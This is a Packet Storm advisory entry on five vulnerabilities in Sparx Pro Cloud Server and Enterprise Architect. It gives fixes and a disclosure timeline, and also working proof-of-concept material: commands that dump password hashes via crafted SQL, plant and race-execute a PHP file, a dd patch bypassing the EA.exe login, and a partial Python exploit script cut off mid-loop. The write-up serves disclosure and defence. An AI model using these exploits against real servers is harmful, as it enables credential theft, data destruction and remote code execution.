{“lastseen”:”2026-05-26T16:00:43″,”description”:”Multiple vulnerabilities in Sparx Pro Cloud Server PCS versions 6.1 and below and Sparx Enterprise Architect versions 17.1 and below allow a remote unauthenticated attacker to execute arbitrary SQL queries both read and write within any configured…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Sparx Pro Cloud Server 6.1 \/ Sparx Enterprise Architect 17.1 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:221993″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-42096″,”CVE-2026-42097″],”sourceData”:”\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\\n Multiple vulnerabilities in Sparx Pro Cloud Server and Enterprise Architect\\n \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\\n \\n General information\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n Multiple vulnerabilities in Sparx Pro Cloud Server (PCS) versions \\u003c=\\n 6.1 and Sparx Enterprise Architect versions \\u003c=17.1 allow a remote\\n unauthenticated attacker to execute arbitrary sql queries (both read\\n and write) within any configured database. In case where PCS is\\n installed with WebEA the vulnerabilities allow further for remote\\n unauthenticated code execution (RCE) within the web server context.\\n \\n CVSSv4 chained score: *10.0 Critical*\\n (AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/VI:H\/VA:H\/SC:H\/SI:H\/SA:H)\\n \\n \\n Fix\\n \u2550\u2550\u2550\\n \\n Currently vendor *did not resolve* any of the CVEs. The PCS\\n authentication bypass and race condition seem to be easy to implement\\n and I hope vendor will release patches soon.\\n \\n As a workaround it is best to isolate the PCS instances from internet\\n and untrusted networks. Create frequent backups and review access logs\\n if possible. You could also setup a proxy to limit the PCS\\n authentication bypass (dropping requests with no or wrong model query\\n parameter.\\n \\n \\n [Vulnerabilitiy #1] Sparx Pro Cloud Server SQL Command Execution\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n CVE\\n \u2500\u2500\u2500\\n \\n CVE-2026-42096 – Broken Access Control in Sparx Pro Cloud Server\\n \\n \\n Affected versions\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Sparx Pro Cloud Server versions \\u003c= 6.1 build 167\\n \\n \\n CVSSv4\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n 9.4 Critical\\n (CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/VI:H\/VA:H\/SC:H\/SI:H\/SA:H)\\n \\n \\n Impact\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n PCS works as a remote model for a thick client, running on user’s\\n computers, called Enterprise Architect (EA). EA connects to PCS and\\n works with the exposed database by directly running SQL queries.\\n Besides user authentication (which is also vulnerable – see\\n vulnerability #2 below) there is no additional access control. Any low\\n privileged user can actually run any sql queries permitted by the\\n configured external database user. Usually the user configured is at\\n least having full access to the model database – thus any low\\n privileged user can actually destroy the whole model, retrieve and\\n change other user’s password hashes and more.\\n \\n The problem seems to be with legacy thick client EA architecture which\\n simply works on a database to manage all the model details.\\n \\n \\n Details\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n The client (EA) is connecting to the PCS HTTP server. The server might\\n require authentication *if it is properly configured* – an admin can\\n check \\”Enable Security\\” in EA but still not select \\”Require a secure\\n and authenticated connection\\” in PCS configuration what results in *NO\\n SERVER SIDE authentication at all*.\\n \\n Assuming the server side authentication is required the PCS verifies\\n the authentication according to configuration – e.g. login\/password,\\n Active Directory or OpenID.\\n \\n Then the EA client sends request to perform SQL queries on the\\n database in an ecrypted form but the whole encryption scheme is built\\n into the client EA binary (actually downloadable from the vendor\\n webside without any authentication – as trial version). The encryption\\n is symmetric using a key contained within the binary itself thus\\n simply this is not any security measure (security by obscurity).\\n \\n An attacker can obtain the key and then *create and send custom SQL\\n queries to be performed by the database*.\\n \\n \\n PoC\\n \u2500\u2500\u2500\\n \\n Exploit: https:\/\/github.com\/br0xpl\/sparx_hack\/blob\/main\/eacrypt.py (packet storm attached poc at bottom)\\n is a python script which exploits the SQL vulnerability by encrypting\\n any SQL command and sending it to the server. For security,\\n the real key is removed from the exploit code.\\n \\n This script receives all users and their hashes from PCS:\\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 python3 eacrypt.py http:\/\/${PCS_HOSTNAME} model \\”select * from t_secuser, t_xref where t_xref.Type=’User Setting’ and t_xref.Name =’SHA-256′ and t_xref.Client=t_secuser.UserID\\”\\n \u2514\u2500\u2500\u2500\u2500\\n \\n \\n Solution\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n It will be hard to introduce proper authorization for all types of SQL\\n queries – this would require to rewrite the logic to use some higher\\n abstraction API which can be properly authorized.\\n \\n Until a proper authorized API will be provided a quick solution could\\n be at least to verify the SQL queries executed and block the most\\n dangerous like asking about other users’ passwords and so on. Maybe a\\n query whitelist with limiting the view of some critical assets like\\n hashes.\\n \\n For sure it should be transparently stated in the PCS and EA\\n documentation web page. Some integrators and admins are aware of this\\n risk (there are some topics on the forum mentioning that the model\\n security is not in fact security) but this *should be well described\\n in both product documentations* as a limitation and risk which needs\\n to be understood by clients and taken into consideration at an early\\n stage while designing a production system. Otherwise it poses a high\\n risk for any company using those products.\\n \\n \\n [Vulnerability #2] Sparx Pro Cloud Server Authentication Bypass\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n CVE\\n \u2500\u2500\u2500\\n \\n CVE-2026-42097 – Authentication Bypass in Sparx Pro Cloud Server\\n \\n \\n Affected versions\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Sparx Pro Cloud Server versions \\u003c= 6.1 build 167\\n \\n \\n CVSSv4\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n 9.2 Critical\\n (CVSS:4.0\/AV:N\/AC:H\/AT:N\/PR:N\/UI:N\/VC:H\/VI:H\/VA:H\/SC:N\/SI:N\/SA:N)\\n \\n \\n Impact\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n An attacker can *omit PCS authentication* and e.g. combined with the\\n previous vulnerability be able to remotely execute arbitrary SQL\\n commands (read and write) *without authentication*.\\n \\n \\n Details\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n It seems that PCS requires authentication based on requested URL. EA\\n clients sending the encrypted SQL query to PCS are using an url which\\n looks as follows:\\n \\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 https:\/\/${PCS_SERVER_HOSTNAME}\/SparxCloudLink.sseap?model=${MODEL_NAME}\\n \u2514\u2500\u2500\u2500\u2500\\n \\n PCS seems to look at the URL and decides how to authenticate the\\n request. Unfortunately the SQL command query sends a POST request with\\n a binary blob where the model name is defined one more time and this\\n is the value that is further used by PCS to execute the query.\\n \\n Thus an attacker can simply omit the model query parameter and send\\n the model name only in the binary blob in both TLS and non-TLS ports\\n and the query will be executed even thought there was no\\n authentication.\\n \\n \\n PoC\\n \u2500\u2500\u2500\\n \\n To quickly verify compare the authenticated response for a request:\\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 curl ‘https:\/\/${PCS_HOSTNAME}\/SparxCloudLink.sseap?model=${MODEL_NAME}’ -X POST -vvv –data ‘whatever’ -k\\n \u2514\u2500\u2500\u2500\u2500\\n \\n which responds 401 Access Denied to response of a request without the\\n query param:\\n \\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 curl ‘https:\/\/${PCS_HOSTNAME}\/SparxCloudLink.sseap’ -X POST -vvv –data ‘whatever’ -k\\n \u2514\u2500\u2500\u2500\u2500\\n \\n which responds 500 Internal Server Error.\\n \\n To proof this properly use the python code which exploits the #1\\n SQL vulnerability and uses the URL without model query parameter to\\n omit the authentication.\\n \\n \\n Solution\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Make a single parameter pointing the model (either in the blob or in\\n query param) and hook authentication and query logic on the same\\n parameter.\\n \\n \\n [Vulnerability #3] Sparx Enterprise Architect Authorization Bypass\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n CVE\\n \u2500\u2500\u2500\\n \\n CVE-2026-42098 – Authorization Bypass in Sparx Enterprise Architect\\n \\n \\n Affected versions\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Sparx Enterprise Architect versions \\u003c= 17.1\\n \\n \\n CVSSv4\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n 7.7 High\\n (CVSS:4.0\/AV:N\/AC:H\/AT:N\/PR:L\/UI:N\/VC:H\/VI:H\/VA:H\/SC:N\/SI:N\/SA:N)\\n \\n \\n Impact\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Sparx Enterprise Architect software has a security feature which can\\n be enabled. When enabled the users can be limited to perform only some\\n actions by roles but this is not a real security measure as it can be\\n easily bypassed.\\n \\n *Any authenticated user can actually perform any action on the model*\\n including deletion, stealing of other users’ passwords and many\\n others. This *includes configurations with Pro Cloud Server* where\\n vendor advertises that PCS brings high level of security for the\\n model:\\n \\n Robust security features are designed to protect sensitive\\n model information, *including role-based access control*,\\n encryption, authentication mechanisms and audit trails.\\n \\n source: \\u003chttps:\/\/www.sparxsystems.eu\/pro-cloud-server\/\\u003e\\n \\n \\n Details\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n This vulnerability, most probably, is a result of the legacy thick\\n client architecture described in the vulnerability #1.\\n \\n The EA documentation states briefly that the security is not a real\\n security:\\n \\n The Security system in Enterprise Architect is designed to\\n facilitate collaboration, *not as a barrier to incursion*.\\n \\n source:\\n \\u003chttps:\/\/sparxsystems.com\/enterprise_architect_user_guide\/17.1\/guide_books\/tools_ba_security.html\\u003e\\n \\n but right below it suggests that model assets should be secured:\\n \\n The information contained in the Repository is a valuable\\n organizational asset that needs to be maintained and\\n secured as such. The asset must be protected from both\\n *intentional* and inadvertent compromises of content. The\\n Security system allows update functions to be restricted\\n to a set of users or groups with the appropriate defined\\n permission. Packages, elements and diagrams can be locked\\n by users, preventing others from updating them.\\n \\n source:\\n \\u003chttps:\/\/sparxsystems.com\/enterprise_architect_user_guide\/17.1\/guide_books\/tools_ba_security.html\\u003e\\n \\n Unfortunately the current design is not protecting against intentional\\n compromises of content. An attacker can modify the EA client behavior\\n (e.g. using a debugger) to login in as any other user or administrator\\n – then it is possible to do every possible change to the repository.\\n \\n \\n PoC\\n \u2500\u2500\u2500\\n \\n To show how it works it is enough to patch the binary to change the\\n logic and accept all incorrect passwords and reject correct ones. For\\n the file version 17.1.0.1714 of EA.exe (md5sum:\\n 69dfe7b98d1fc156d15d8aeff726cfce) the following would patch the logic:\\n \\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 printf ‘\\\\x84’ | dd of=EA.exe bs=1 seek=$((0x34657B2)) conv=notrunc\\n \u2514\u2500\u2500\u2500\u2500\\n \\n Then run the patched exe and try to login to local model with\\n different password. It also works obviously for cloud models which do\\n not require server HTTP authentication or when using the \\”Login as\\n different user option\\”.\\n \\n \\n Solution\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n The way security works for EA should be properly and transparently\\n presented in the EA documentation and installation notes. The sentence\\n quoted above is not enough and can be easily misinterpreted by many\\n users leading to vulnerabilities.\\n \\n Also it should be explained that even when using PCS after\\n authentication there is no authorization until visibility levels are\\n enabled which are working per whole database manager not user – so in\\n fact there is no user based RBAC but rather database manager RBAC what\\n is much more coarse grained then per user roles access control.\\n \\n In terms of combination of EA and PCS it is possible to secure the\\n design by e.g. following the recommendations proposed in vulnerability\\n #1.\\n \\n \\n [Vulnerability #4] Sparx Pro Cloud Server WebEA Remote Code Execution\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n CVE\\n \u2500\u2500\u2500\\n \\n CVE-2026-42099 – Race Condition in Sparx Pro Cloud Server\\n \\n \\n Affected versions\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Sparx Pro Cloud Server versions \\u003c= 6.1 build 167\\n \\n \\n CVSSv4\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n 9.0 Critical\\n (CVSS:4.0\/AV:N\/AC:H\/AT:P\/PR:L\/UI:N\/VC:H\/VI:H\/VA:H\/SC:H\/SI:H\/SA:H)\\n \\n \\n Impact\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n PCS configured with WebEA PHP application allows for remote command\\n execution using the \/data_api\/dl_internal_artifact.php endpoint. This\\n URL is used by WebEA to download content of a internal artifact. A\\n remote attacker having access to the PCS repository is able to inject\\n a malicious php file into the model and then request its download.\\n \\n The vulnerable dl_internal_artifact.php allows the remote attacker to\\n create temporary php file and concurrently execute it before it gets\\n deleted.\\n \\n The remote attacker can use this attack to gain execution in context\\n of WebEA which allows to further explore the WebEA and PCS server\\n configuration.\\n \\n \\n Details\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n The vulnerable file first downloads the properties of the object\\n pointed by guid parameter:\\n \\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 49 include(‘get_properties.php’);\\n \u2502 50 $sObjectName = SafeGetArrayItem1Dim($aCommonProps, ‘name’);\\n \u2502 51 $sDocContent = SafeGetArrayItem1Dim($aDocument, ‘content’);\\n \u2502 52 $sExtension = SafeGetArrayItem1Dim($aDocument, ‘extension’);\\n \u2502 53 $sFileName = $sObjectName;\\n \u2502 54 $iExtLength = strlen($sExtension);\\n \u2502 55 $sObjectNameEnd = substr($sObjectName, -$iExtLength);\\n \u2502 56 if($sExtension !== $sObjectNameEnd)\\n \u2502 57 {\\n \u2502 58 $sFileName = $sObjectName . $sExtension;\\n \u2502 59 }\\n \u2514\u2500\u2500\u2500\u2500\\n Listing 1: WebEA\/data_api\/dl_internal_artifact.php\\n \\n Then the loaded content is saved in current location (__DIR__) and the\\n evaluated above filename and then it is returned:\\n \\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 77 …\\n \u2502 78 function DownloadFromTempFile($sFileName, $sDocContent)\\n \u2502 79 {\\n \u2502 80 $decoded = base64_decode($sDocContent);\\n \u2502 81 file_put_contents($sFileName, $decoded);\\n \u2502 82 if (file_exists($sFileName)) {\\n \u2502 83 header(‘Content-Description: File Transfer’);\\n \u2502 84 header(‘Content-Type: application\/octet-stream’);\\n \u2502 85 header(‘Content-Disposition: attachment; filename=\\”‘.basename($sFileName).’\\”‘);\\n \u2502 86 header(‘Expires: 0’);\\n \u2502 87 header(‘Cache-Control: must-revalidate’);\\n \u2502 88 header(‘Pragma: public’);\\n \u2502 89 header(‘Content-Length: ‘ . filesize($sFileName));\\n \u2502 90 readfile($sFileName);\\n \u2502 91 unlink($sFileName);\\n \u2502 92 exit;\\n \u2502 93 }\\n \u2502 94 }\\n \u2502 95 …\\n \u2514\u2500\u2500\u2500\u2500\\n Listing 2: WebEA\/data_api\/dl_internal_artifact.php\\n \\n The attacker having access to the repository fully controls both: 1)\\n the filename and 2) the contents. Thus it is possible to simply write\\n a .php file in the current directory.\\n \\n The script however deletes the file in line 91 above. However, there\\n is a race condition – if the readfile takes longer to transmit (large\\n file size, slow tcp client) then the readfile will simply block\\n waiting for the client to receive. At the same time the file can be\\n requested in another tcp connection executing the exploit php code.\\n \\n \\n PoC\\n \u2500\u2500\u2500\\n \\n 1. Using vulnerabilities #1 and #2 attacker can create the artifact in\\n the target repository:\\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 python3 eacrypt.py https:\/\/${PCS_HOSTNAME} ${MODEL_NAME} \\”insert into t_object (object_id, object_type, name, author, style, ea_guid) values (100000, ‘Artifact’, ‘poc.php’, ‘Admin’, ‘ExtDoc=1;’, ‘{\\\\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\\\\!C}’)\\”\\n \u2502 # insert the document (zipped php file simply printing \\”Test\\”) as \\”poc.php\\”\\n \u2502 python3 eacrypt.py https:\/\/${PCS_HOSTNAME} ${MODEL_NAME} \\”insert into t_document (docid, docname, elementid, elementtype, bincontent, doctype, author, isactive, sequence) values (‘{\\\\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\\\\!C}’, ‘poc.php’, ‘{\\\\!A}8889BA10-6178-4047-9273-37FC75B0FCF6{\\\\!C}’, ‘.php’, cast(x’504b03041400000008005497575bfe1a3fd00c0300006141030007001c007374722e6461745554090003bf5efa68ce5efa6875780b000104e803000004e8030000edcdb10980301000c0fee1e750d3b8809825b28104ec0ce8fe388556770bdc56c73932fa715ef3d4fafd4c4bc65a32daf7241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482412894422914824128944229148241289442291482492df92b266d43de305504b01021e031400000008005497575bfe1a3fd00c03000061410300070018000000000001000000a481000000007374722e6461745554050003bf5efa6875780b000104e803000004e8030000504b050600000000010001004d0000004d0300000000′ as blob sub_type binary), ‘ExtDoc’, ‘Admin’, 177, 0)\\” \\n \u2514\u2500\u2500\u2500\u2500\\n \\n 2. In one terminal start to query the poc.php file until it is\\n executed:\\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 while [ true ]; do curl ‘https:\/\/${WEBEA_HOSTNAME}\/data_api\/poc.php’ -k; done 2\\u003e \/dev\/null | grep Test\\n \u2514\u2500\u2500\u2500\u2500\\n \\n 3. While the above command is executing in another terminal or logged\\n in browser window open the following URL:\\n \\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 https:\/\/${WEBEA_HOSTNAME}\/data_api\/dl_internal_artifact.php?guid=el_%7B8889BA10-6178-4047-9273-37FC75B0FCF6%7D\\u0026modelno=1\\n \u2514\u2500\u2500\u2500\u2500\\n \\n 4. In the terminal from step 2 there should be \\”Test\\” printed (proof\\n that php code executed), if not try to repeat step 3.\\n \\n \\n Solution\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n The solution should be to return the content without saving it to\\n disk. If necessary it should be saved in a temporary folder not\\n accesible within webserver. Also the temporary file does not have to\\n have the same name as the name returned – it should not use the\\n filename from the model (controlled by user).\\n \\n \\n [Vulnerability #5] Sparx Pro Cloud Server Deny of Service in the \/SparxCloudLink.sseap endpoint\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n CVE\\n \u2500\u2500\u2500\\n \\n CVE-2026-42100 – DoS in Sparx Pro Cloud Server\\n \\n \\n Affected versions\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Sparx Pro Cloud Server versions \\u003c= 6.1 build 167\\n \\n \\n CVSSv4\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n 8.7 High\\n (CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:N\/VI:N\/VA:H\/SC:N\/SI:N\/SA:N)\\n \\n \\n Impact\\n \u2500\u2500\u2500\u2500\u2500\u2500\\n \\n An attacker can make the PCS service exit causing a Deny of Service.\\n The error was not deeply analyzed but it is possible that this or\\n similar buffer operation bugs could be exploited to a code execution.\\n \\n \\n Details\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Sending an SQL query with started escape sequence \\”{\\” without the\\n finishing curly brace causes the PCS service to terminate\\n unexpectedly.\\n \\n \\n PoC\\n \u2500\u2500\u2500\\n \\n Run the following SQL query:\\n \u250c\u2500\u2500\u2500\u2500\\n \u2502 python3 eacrypt.py http:\/\/${PCS_HOSTNAME} model \\”select {asd\\”\\n \u2514\u2500\u2500\u2500\u2500\\n \\n The script will finish with \\”Connection reset by peer\\” error and the\\n service will exit with the following message:\\n \\n [FATAL]: \u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2013 [FATAL]: Thread 112 Unrecoverable\\n error\\n \\n \\n Solution\\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\\n \\n Correct the handling of escape sequencing and parsing the SQL query\\n for proper boundary checks. Recheck that there are no potential buffer\\n overflow errors within the logic.\\n \\n \\n Timeline\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n \u2022 09.2025 – Vulnerabilities identified.\\n \u2022 21.11.2025 – Sending details to CERT Polska to contact vendor.\\n \u2022 25.11.2025 – First contact of CERT Polska with Vendor.\\n \u2022 06.02.2026 – First Vendor reply with standard first-support-line\\n questions about products, versions etc.\\n \u2022 14.04.2026 – Because of lack of progress Vendor was informed about\\n planned publication according to the procedure – within 90 days of\\n providing details.\\n \u2022 19.05.2026 – CVEs published.\\n \\n \\n References\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n \u2022 \\u003chttps:\/\/sploit.tech\/2026\/05\/19\/Sparx-Enterprise-Architect-PCS.html\\u003e\\n – details with video\\n \u2022 \\u003chttps:\/\/efigo.pl\/blog\/CVE-2026-42096\/\\u003e – summary\\n \u2022 \\u003chttps:\/\/cert.pl\/en\/posts\/2026\/05\/CVE-2026-42096\\u003e – advisory\\n \u2022 \\u003chttps:\/\/sparxsystems.com\/products\/procloudserver\/\\u003e – product\u2019s\\n website\\n \\n Credits\\n \u2550\u2550\u2550\u2550\u2550\u2550\u2550\\n \\n Author: Blazej Adamczyk (br0x) | \\u003chttps:\/\/sploit.tech\/\\u003e\\n \\n Team: Efigo \\u003chttps:\/\/efigo.pl\/\\u003e\\n \\n \\n — packet storm attached poc —\\n \\n import sys\\n import requests\\n import urllib3\\n import pycurl\\n from io import BytesIO\\n import zipfile\\n \\n \\n \\n k=\\”HERE_SHOULD_BE_THE_KEY\\”\\n x=[4, 2, 0, 6, 3, 1, 5]\\n xr=[x.index(i) for i in range(7)]\\n \\n def mangle(s:str) -\\u003e str:\\n o=bytearray(s,\\”utf-8\\”)\\n for i in range((len(s) \/\/ 7)*7):\\n o[i]=ord(s[((i \/\/ 7)*7)+xr[i % 7]])\\n return o.decode(\\”utf-8\\”)\\n \\n \\n def demangle(s:str) -\\u003e str:\\n o=bytearray(s,\\”utf-8\\”)\\n for i in range((len(s) \/\/ 7)*7):\\n o[i]=ord(s[((i \/\/ 7)*7)+x[i % 7]])\\n return o.decode(\\”utf-8\\”)\\n \\n \\n \\n \\n \\n def custom_decode(ciphertext: str, key: str) -\\u003e str:\\n \\”\\”\\”\\n Decode using the custom cipher.\\n \\n ciphertext : input string (Unicode)\\n key : key string (Unicode)\\n \\n Returns plaintext string (printable ASCII 0x20\u20130x7E).\\n \\”\\”\\”\\n output_chars = []\\n length = len(ciphertext)\\n key_len = len(key)\\n \\n for i, ch in enumerate(ciphertext):\\n # load plaintext character as integer\\n c_val = ord(ch)\\n \\n # derive key value (word from key string)\\n k_val = ord(key[(i+length) % key_len])\\n \\n c_val = c_val – 0x20 – k_val + 0x40\\n \\n if c_val\\u003c0x20:\\n c_val=c_val+0x5E\\n if c_val\\u003e(0x5E+0x20):\\n c_val=c_val-0x5E\\n \\n output_chars.append(chr(c_val))\\n \\n return \\”\\”.join(output_chars)\\n \\n \\n \\n \\n def custom_encode(plaintext: str, key: str) -\\u003e str:\\n \\”\\”\\”\\n Encode plaintext using the custom cipher.\\n \\n plaintext : input string (Unicode)\\n key : key string (Unicode)\\n \\n Returns encoded string (printable ASCII 0x20\u20130x7E).\\n \\”\\”\\”\\n output_chars = []\\n length = len(plaintext)\\n key_len = len(key)\\n \\n for i, ch in enumerate(plaintext):\\n # load plaintext character as integer\\n c_val = ord(ch)\\n \\n # subtract 0x40\\n c_val = c_val – 0x40\\n \\n # derive key value (word from key string)\\n k_val = ord(key[(i+length) % key_len])\\n \\n # add key\\n total = k_val + c_val\\n \\n # modulo 94\\n total = total % 0x5E\\n \\n # add 0x20 (ensures printable ASCII)\\n encoded_val = total + 0x20\\n \\n # append encoded character\\n output_chars.append(chr(encoded_val))\\n \\n return \\”\\”.join(output_chars)\\n \\n \\n def test(debug_type, debug_msg):\\n print(\\”debug(%d): %s\\” % (debug_type, debug_msg))\\n \\n if __name__ == \\”__main__\\”:\\n \\n if (len(sys.argv)!=4):\\n print(\\”Usage: \\”+sys.argv[0]+\\” URL_without_sparxcloudlink_path model_name sql\\”)\\n exit(-1)\\n \\n host = sys.argv[1]\\n repo = sys.argv[2]\\n sqli = sys.argv[3]\\n #url = \\”%s\/SparxCloudLink.sseap?model=%s\\”%(host,repo)\\n url = \\”%s\/SparxCloudLink.sseap\\”%(host)\\n print(url) \\n \\n \\n sqli = str(len(sqli))+\\”:\\”+sqli\\n \\n fill=\\”+d1XL|@\\”\\n sqli += fill[-(7-(len(sqli)%7)):]\\n print (sqli)\\n #sqli=\\”23:Select * from t_secuser|@\\”\\n ret=custom_encode(mangle(sqli),k)\\n \\n \\n binary=bytes([0,0,0,1,0,0])\\n binary+=bytes.fromhex(‘%04X’%(len(ret)*2+66))\\n \\n \\n binary+=bytes.fromhex(‘%04X’%(len(repo)))\\n for c in repo:\\n binary+=bytes([ord(c),0])\\n \\n \\n binary+=bytes([0,1,0,0])\\n binary+=bytes.fromhex(‘%04X’%(len(ret)))\\n \\n for c in ret:\\n 